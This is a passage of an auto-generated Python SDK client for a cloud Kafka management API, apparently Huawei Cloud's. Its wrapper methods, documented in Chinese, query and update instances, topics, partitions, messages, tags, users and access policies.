show_cluster_with_http_info(self, request): """查询Kafka集群元数据信息 查询Kafka集群元数据信息。 :param ShowClusterRequest request :return: ShowClusterResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/cluster', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowClusterResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_coordinators_async(self, request): """查询Kafka实例的协调器信息 查询Kafka实例的协调器信息。 :param ShowCoordinatorsRequest request :return: ShowCoordinatorsResponse """ return self.show_coordinators_with_http_info(request) def show_coordinators_with_http_info(self, request): """查询Kafka实例的协调器信息 查询Kafka实例的协调器信息。 :param ShowCoordinatorsRequest request :return: ShowCoordinatorsResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/coordinators', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowCoordinatorsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_groups_async(self, request): """查询消费组信息 查询消费组信息。 :param ShowGroupsRequest request :return: ShowGroupsResponse """ return self.show_groups_with_http_info(request) def show_groups_with_http_info(self, request): """查询消费组信息 查询消费组信息。 :param ShowGroupsRequest request :return: ShowGroupsResponse """ all_params = ['instance_id', 'group'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'group' in local_var_params: path_params['group'] = local_var_params['group'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/groups/{group}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowGroupsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_async(self, request): """查询指定实例 查询指定实例的详细信息。 :param ShowInstanceRequest request :return: ShowInstanceResponse """ return self.show_instance_with_http_info(request) def show_instance_with_http_info(self, request): """查询指定实例 查询指定实例的详细信息。 :param ShowInstanceRequest request :return: ShowInstanceResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_extend_product_info_async(self, request): """查询实例的扩容规格列表 查询实例的扩容规格列表。 :param ShowInstanceExtendProductInfoRequest request :return: ShowInstanceExtendProductInfoResponse """ return self.show_instance_extend_product_info_with_http_info(request) def show_instance_extend_product_info_with_http_info(self, request): """查询实例的扩容规格列表 查询实例的扩容规格列表。 :param ShowInstanceExtendProductInfoRequest request :return: ShowInstanceExtendProductInfoResponse """ all_params = ['instance_id', 'type', 'engine'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'type' in local_var_params: query_params.append(('type', local_var_params['type'])) if 'engine' in local_var_params: query_params.append(('engine', local_var_params['engine'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/extend', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceExtendProductInfoResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_messages_async(self, request): """查询消息 查询消息的偏移量和消息内容。 先根据时间戳查询消息的偏移量,再根据偏移量查询消息内容。 :param ShowInstanceMessagesRequest request :return: ShowInstanceMessagesResponse """ return self.show_instance_messages_with_http_info(request) def show_instance_messages_with_http_info(self, request): """查询消息 查询消息的偏移量和消息内容。 先根据时间戳查询消息的偏移量,再根据偏移量查询消息内容。 :param ShowInstanceMessagesRequest request :return: ShowInstanceMessagesResponse """ all_params = ['instance_id', 'topic', 'asc', 'start_time', 'end_time', 'limit', 'offset', 'download', 'message_offset', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'topic' in local_var_params: query_params.append(('topic', local_var_params['topic'])) if 'asc' in local_var_params: query_params.append(('asc', local_var_params['asc'])) if 'start_time' in local_var_params: query_params.append(('start_time', local_var_params['start_time'])) if 'end_time' in local_var_params: query_params.append(('end_time', local_var_params['end_time'])) if 'limit' in local_var_params: query_params.append(('limit', local_var_params['limit'])) if 'offset' in local_var_params: query_params.append(('offset', local_var_params['offset'])) if 'download' in local_var_params: query_params.append(('download', local_var_params['download'])) if 'message_offset' in local_var_params: query_params.append(('message_offset', local_var_params['message_offset'])) if 'partition' in local_var_params: query_params.append(('partition', local_var_params['partition'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/messages', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceMessagesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_topic_detail_async(self, request): """查询Kafka实例Topic详细信息 查询Kafka实例Topic详细信息。 :param ShowInstanceTopicDetailRequest request :return: ShowInstanceTopicDetailResponse """ return self.show_instance_topic_detail_with_http_info(request) def show_instance_topic_detail_with_http_info(self, request): """查询Kafka实例Topic详细信息 查询Kafka实例Topic详细信息。 :param ShowInstanceTopicDetailRequest request :return: ShowInstanceTopicDetailResponse """ all_params = ['instance_id', 'topic'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceTopicDetailResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_instance_users_async(self, request): """查询用户列表 查询用户列表。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowInstanceUsersRequest request :return: ShowInstanceUsersResponse """ return self.show_instance_users_with_http_info(request) def show_instance_users_with_http_info(self, request): """查询用户列表 查询用户列表。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowInstanceUsersRequest request :return: ShowInstanceUsersResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowInstanceUsersResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_kafka_project_tags_async(self, request): """查询项目标签 查询项目标签。 :param ShowKafkaProjectTagsRequest request :return: ShowKafkaProjectTagsResponse """ return self.show_kafka_project_tags_with_http_info(request) def show_kafka_project_tags_with_http_info(self, request): """查询项目标签 查询项目标签。 :param ShowKafkaProjectTagsRequest request :return: ShowKafkaProjectTagsResponse """ all_params = [] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/kafka/tags', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowKafkaProjectTagsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_kafka_tags_async(self, request): """查询实例标签 查询实例标签。 :param ShowKafkaTagsRequest request :return: ShowKafkaTagsResponse """ return self.show_kafka_tags_with_http_info(request) def show_kafka_tags_with_http_info(self, request): """查询实例标签 查询实例标签。 :param ShowKafkaTagsRequest request :return: ShowKafkaTagsResponse """ all_params = ['instance_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/kafka/{instance_id}/tags', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowKafkaTagsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_kafka_topic_partition_diskusage_async(self, request): """查询topic的磁盘存储情况 查询topic在Broker上磁盘占用情况。 :param ShowKafkaTopicPartitionDiskusageRequest request :return: ShowKafkaTopicPartitionDiskusageResponse """ return self.show_kafka_topic_partition_diskusage_with_http_info(request) def show_kafka_topic_partition_diskusage_with_http_info(self, request): """查询topic的磁盘存储情况 查询topic在Broker上磁盘占用情况。 :param ShowKafkaTopicPartitionDiskusageRequest request :return: ShowKafkaTopicPartitionDiskusageResponse """ all_params = ['instance_id', 'min_size', 'top', 'percentage'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] if 'min_size' in local_var_params: query_params.append(('minSize', local_var_params['min_size'])) if 'top' in local_var_params: query_params.append(('top', local_var_params['top'])) if 'percentage' in local_var_params: query_params.append(('percentage', local_var_params['percentage'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics/diskusage', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowKafkaTopicPartitionDiskusageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_maintain_windows_async(self, request): """查询维护时间窗时间段 查询维护时间窗开始时间和结束时间。 :param ShowMaintainWindowsRequest request :return: ShowMaintainWindowsResponse """ return self.show_maintain_windows_with_http_info(request) def show_maintain_windows_with_http_info(self, request): """查询维护时间窗时间段 查询维护时间窗开始时间和结束时间。 :param ShowMaintainWindowsRequest request :return: ShowMaintainWindowsResponse """ all_params = [] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/instances/maintain-windows', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowMaintainWindowsResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_messages_async(self, request): """查询分区指定时间段的消息 查询分区指定时间段的消息。 :param ShowMessagesRequest request :return: ShowMessagesResponse """ return self.show_messages_with_http_info(request) def show_messages_with_http_info(self, request): """查询分区指定时间段的消息 查询分区指定时间段的消息。 :param ShowMessagesRequest request :return: ShowMessagesResponse """ all_params = ['instance_id', 'topic', 'start_time', 'end_time', 'limit', 'offset', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] if 'start_time' in local_var_params: query_params.append(('start_time', local_var_params['start_time'])) if 'end_time' in local_var_params: query_params.append(('end_time', local_var_params['end_time'])) if 'limit' in local_var_params: query_params.append(('limit', local_var_params['limit'])) if 'offset' in local_var_params: query_params.append(('offset', local_var_params['offset'])) if 'partition' in local_var_params: query_params.append(('partition', local_var_params['partition'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/messages', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowMessagesResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_partition_beginning_message_async(self, request): """查询分区最早消息的位置 查询分区最早消息的位置。 :param ShowPartitionBeginningMessageRequest request :return: ShowPartitionBeginningMessageResponse """ return self.show_partition_beginning_message_with_http_info(request) def show_partition_beginning_message_with_http_info(self, request): """查询分区最早消息的位置 查询分区最早消息的位置。 :param ShowPartitionBeginningMessageRequest request :return: ShowPartitionBeginningMessageResponse """ all_params = ['instance_id', 'topic', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] if 'partition' in local_var_params: path_params['partition'] = local_var_params['partition'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions/{partition}/beginning-message', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowPartitionBeginningMessageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_partition_end_message_async(self, request): """查询分区最新消息的位置 查询分区最新消息的位置。 :param ShowPartitionEndMessageRequest request :return: ShowPartitionEndMessageResponse """ return self.show_partition_end_message_with_http_info(request) def show_partition_end_message_with_http_info(self, request): """查询分区最新消息的位置 查询分区最新消息的位置。 :param ShowPartitionEndMessageRequest request :return: ShowPartitionEndMessageResponse """ all_params = ['instance_id', 'topic', 'partition'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] if 'partition' in local_var_params: path_params['partition'] = local_var_params['partition'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions/{partition}/end-message', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowPartitionEndMessageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_partition_message_async(self, request): """查询分区指定偏移量的消息 查询分区指定偏移量的消息。 :param ShowPartitionMessageRequest request :return: ShowPartitionMessageResponse """ return self.show_partition_message_with_http_info(request) def show_partition_message_with_http_info(self, request): """查询分区指定偏移量的消息 查询分区指定偏移量的消息。 :param ShowPartitionMessageRequest request :return: ShowPartitionMessageResponse """ all_params = ['instance_id', 'topic', 'partition', 'message_offset'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] if 'partition' in local_var_params: path_params['partition'] = local_var_params['partition'] query_params = [] if 'message_offset' in local_var_params: query_params.append(('message_offset', local_var_params['message_offset'])) header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/partitions/{partition}/message', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowPartitionMessageResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_sink_task_detail_async(self, request): """查询单个转储任务 查询单个转储任务。 :param ShowSinkTaskDetailRequest request :return: ShowSinkTaskDetailResponse """ return self.show_sink_task_detail_with_http_info(request) def show_sink_task_detail_with_http_info(self, request): """查询单个转储任务 查询单个转储任务。 :param ShowSinkTaskDetailRequest request :return: ShowSinkTaskDetailResponse """ all_params = ['connector_id', 'task_id'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks/{task_id}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowSinkTaskDetailResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_topic_access_policy_async(self, request): """查询用户权限 查询用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowTopicAccessPolicyRequest request :return: ShowTopicAccessPolicyResponse """ return self.show_topic_access_policy_with_http_info(request) def show_topic_access_policy_with_http_info(self, request): """查询用户权限 查询用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowTopicAccessPolicyRequest request :return: ShowTopicAccessPolicyResponse """ all_params = ['instance_id', 'topic_name'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic_name' in local_var_params: path_params['topic_name'] = local_var_params['topic_name'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v1/{project_id}/instances/{instance_id}/topics/{topic_name}/accesspolicy', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowTopicAccessPolicyResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_async(self, request): """修改实例信息 修改实例的名称和描述信息。 :param UpdateInstanceRequest request :return: UpdateInstanceResponse """ return self.update_instance_with_http_info(request) def update_instance_with_http_info(self, request): """修改实例信息 修改实例的名称和描述信息。 :param UpdateInstanceRequest request :return: UpdateInstanceResponse """ all_params = ['instance_id', 'update_instance_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_auto_create_topic_async(self, request): """开启或关闭实例自动创建topic功能 开启或关闭实例自动创建topic功能。 :param UpdateInstanceAutoCreateTopicRequest request :return: UpdateInstanceAutoCreateTopicResponse """ return self.update_instance_auto_create_topic_with_http_info(request) def update_instance_auto_create_topic_with_http_info(self, request): """开启或关闭实例自动创建topic功能 开启或关闭实例自动创建topic功能。 :param UpdateInstanceAutoCreateTopicRequest request :return: UpdateInstanceAutoCreateTopicResponse """ all_params = ['instance_id', 'update_instance_auto_create_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/autotopic', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceAutoCreateTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_cross_vpc_ip_async(self, request): """修改实例跨VPC访问的内网IP 修改实例跨VPC访问的内网IP。 :param UpdateInstanceCrossVpcIpRequest request :return: UpdateInstanceCrossVpcIpResponse """ return self.update_instance_cross_vpc_ip_with_http_info(request) def update_instance_cross_vpc_ip_with_http_info(self, request): """修改实例跨VPC访问的内网IP 修改实例跨VPC访问的内网IP。 :param UpdateInstanceCrossVpcIpRequest request :return: UpdateInstanceCrossVpcIpResponse """ all_params = ['instance_id', 'update_instance_cross_vpc_ip_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/crossvpc/modify', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceCrossVpcIpResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_topic_async(self, request): """修改Kafka实例Topic 修改Kafka实例Topic :param UpdateInstanceTopicRequest request :return: UpdateInstanceTopicResponse """ return self.update_instance_topic_with_http_info(request) def update_instance_topic_with_http_info(self, request): """修改Kafka实例Topic 修改Kafka实例Topic :param UpdateInstanceTopicRequest request :return: UpdateInstanceTopicResponse """ all_params = ['instance_id', 'update_instance_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_sink_task_quota_async(self, request): """修改转储任务的配额 修改转储任务的配额。 :param UpdateSinkTaskQuotaRequest request :return: UpdateSinkTaskQuotaResponse """ return self.update_sink_task_quota_with_http_info(request) def update_sink_task_quota_with_http_info(self, request): """修改转储任务的配额 修改转储任务的配额。 :param UpdateSinkTaskQuotaRequest request :return: UpdateSinkTaskQuotaResponse """ all_params = ['connector_id', 'update_sink_task_quota_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateSinkTaskQuotaResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_topic_access_policy_async(self, request): """设置用户权限 设置用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param UpdateTopicAccessPolicyRequest request :return: UpdateTopicAccessPolicyResponse """ return self.update_topic_access_policy_with_http_info(request) def update_topic_access_policy_with_http_info(self, request): """设置用户权限 设置用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param UpdateTopicAccessPolicyRequest request :return: UpdateTopicAccessPolicyResponse """ all_params = ['instance_id', 'update_topic_access_policy_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v1/{project_id}/instances/{instance_id}/topics/accesspolicy', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateTopicAccessPolicyResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_topic_replica_async(self, request): """修改Kafka实例Topic分区的副本 修改Kafka实例Topic分区的副本。 :param UpdateTopicReplicaRequest request :return: UpdateTopicReplicaResponse """ return 